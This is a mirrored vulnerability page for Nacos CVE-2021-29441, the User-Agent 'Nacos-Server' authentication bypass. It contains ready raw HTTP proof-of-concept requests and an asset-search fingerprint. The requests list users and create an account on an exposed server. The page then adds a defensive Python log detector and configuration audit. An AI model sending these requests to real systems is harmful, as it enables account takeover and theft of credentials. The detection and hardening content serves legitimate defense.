mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
# Nacos Unauthorized Access Vulnerability (CVE-2021-29441)

# 1. Vulnerability Overview
Nacos is an open-source project from Alibaba: a dynamic service discovery, configuration management and service management platform that makes building cloud-native applications easier and is intended to help discover, configure and manage microservices. Nacos provides a simple, easy-to-use feature set for quickly implementing dynamic service discovery, service configuration, service metadata and traffic management.

The vulnerability lies in how Nacos performs authentication and authorization: it checks whether the request's User-Agent is "Nacos-Server" and, if so, skips authentication entirely. The developers intended this to handle server-to-server requests, but the mechanism is too simple: the agreed User-Agent value "Nacos-Server" is hardcoded directly in the source, so anyone who sends that header is treated as a server. By exploiting this unauthorized access, an attacker can obtain sensitive information such as usernames and passwords.

# 2. Affected Versions
+ Nacos <= 2.0.0-ALPHA.1

# 3. Asset Discovery
+ hunter: `app.name="Nacos"`
+ Fingerprint

# 4. Reproduction
PoC request:

```plain
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
```

Adding an account through the unauthorized access:

```plain
POST /nacos/v1/auth/users HTTP/1.1
Host:
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=test&password=test
```

Check whether the account was added successfully:

```plain
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
```

Log in with the added account.
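As an added example (not code from the original page or from the Nacos project), the following Python script shows the defender's side of both the User-Agent check described in the overview and the request sequence in the reproduction section. It flags calls to `/nacos/v1/auth/` endpoints that carry the `Nacos-Server` User-Agent from addresses that are not cluster members, and it audits an `application.properties` for the settings Nacos 1.4.1 and later document for closing the bypass (`nacos.core.auth.enabled`, `nacos.core.auth.enable.userAgentAuthWhite`, `nacos.core.auth.server.identity.key` / `.value`). The log line format, the trusted node addresses and the sample configurations are constructed for illustration; treating an absent `userAgentAuthWhite` setting as a finding is a deliberately conservative assumption, since its default has changed between versions.

```python
"""Detection and hardening checks around the Nacos User-Agent bypass (CVE-2021-29441).

Added example, not code from the original page or from the Nacos project.
The log format, trusted-node list and sample configurations are constructed.
"""
import re
from dataclasses import dataclass

# The PoC requests target this prefix with the server-to-server User-Agent.
AUTH_PATH_PREFIX = "/nacos/v1/auth/"
SERVER_UA = "Nacos-Server"

# Hypothetical cluster member addresses (constructed); legitimate
# server-to-server calls should only originate from these.
TRUSTED_NODES = frozenset({"10.0.0.11", "10.0.0.12", "10.0.0.13"})

# Combined-log style: ip ident user [ts] "METHOD PATH PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    ip: str
    method: str
    path: str
    status: int
    reason: str


def analyze_log(lines, trusted_nodes=TRUSTED_NODES):
    """One Finding per auth-API request with the Nacos-Server User-Agent
    that does not come from a known cluster node."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format: skip rather than guess
        ip, path, ua = m["ip"], m["path"], m["ua"]
        if not path.startswith(AUTH_PATH_PREFIX) or not ua.startswith(SERVER_UA):
            continue
        if ip in trusted_nodes:
            continue
        method, status = m["method"], int(m["status"])
        if method == "POST" and status == 200:
            reason = "account creation with server User-Agent from untrusted address"
        else:
            reason = "auth API access with server User-Agent from untrusted address"
        findings.append(Finding(ip, method, path, status, reason))
    return findings


def parse_properties(text):
    """Minimal Java .properties parser: key=value lines, '#' and '!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit_auth_config(text):
    """List hardening gaps in a Nacos application.properties. Absent keys are
    treated as unsafe: auth defaults to off, and the User-Agent whitelist is
    assumed active unless explicitly set to false (conservative assumption)."""
    p = parse_properties(text)
    problems = []
    if p.get("nacos.core.auth.enabled", "false").lower() != "true":
        problems.append("nacos.core.auth.enabled is not true: authentication is off entirely")
    if p.get("nacos.core.auth.enable.userAgentAuthWhite", "true").lower() != "false":
        problems.append("nacos.core.auth.enable.userAgentAuthWhite is not false: User-Agent bypass stays active")
    if not p.get("nacos.core.auth.server.identity.key") or not p.get("nacos.core.auth.server.identity.value"):
        problems.append("server identity key/value not set: nodes have no replacement for the User-Agent whitelist")
    return problems


# Constructed access-log sample: one legitimate cluster call, an external probe
# followed by an account creation (the PoC sequence), and ordinary browser traffic.
SAMPLE_LOG = [
    '10.0.0.12 - - [28/Oct/2024:15:59:45 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1" 200 512 "-" "Nacos-Server"',
    '203.0.113.7 - - [28/Oct/2024:16:01:02 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1" 200 512 "-" "Nacos-Server"',
    '203.0.113.7 - - [28/Oct/2024:16:01:10 +0000] "POST /nacos/v1/auth/users HTTP/1.1" 200 21 "-" "Nacos-Server"',
    '198.51.100.4 - - [28/Oct/2024:16:02:00 +0000] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [28/Oct/2024:16:02:30 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]

WEAK_CONFIG = "# constructed: shipped defaults, authentication never enabled\nnacos.core.auth.enabled=false\n"
HARDENED_CONFIG = (
    "nacos.core.auth.enabled=true\n"
    "nacos.core.auth.enable.userAgentAuthWhite=false\n"
    "nacos.core.auth.server.identity.key=serverIdentity\n"
    "nacos.core.auth.server.identity.value=REPLACE_WITH_RANDOM_SECRET\n"
)

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f.ip} {f.method} {f.path} {f.status}: {f.reason}")
    print("weak config:", audit_auth_config(WEAK_CONFIG))
    print("hardened config:", audit_auth_config(HARDENED_CONFIG))
```

Run against the constructed sample, the script reports the two external `Nacos-Server` requests (the listing and the account creation) and ignores the same listing when it comes from a cluster node, which is the distinction that makes the alert useful: on a patched and correctly configured instance the header alone grants nothing, so any hit from outside the cluster is worth a look.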
> Updated: 2024-10-28 15:59:45
> Source: <https://www.yuque.com/xiaokp7/ocvun2/gygvcmtv1bh6n6za>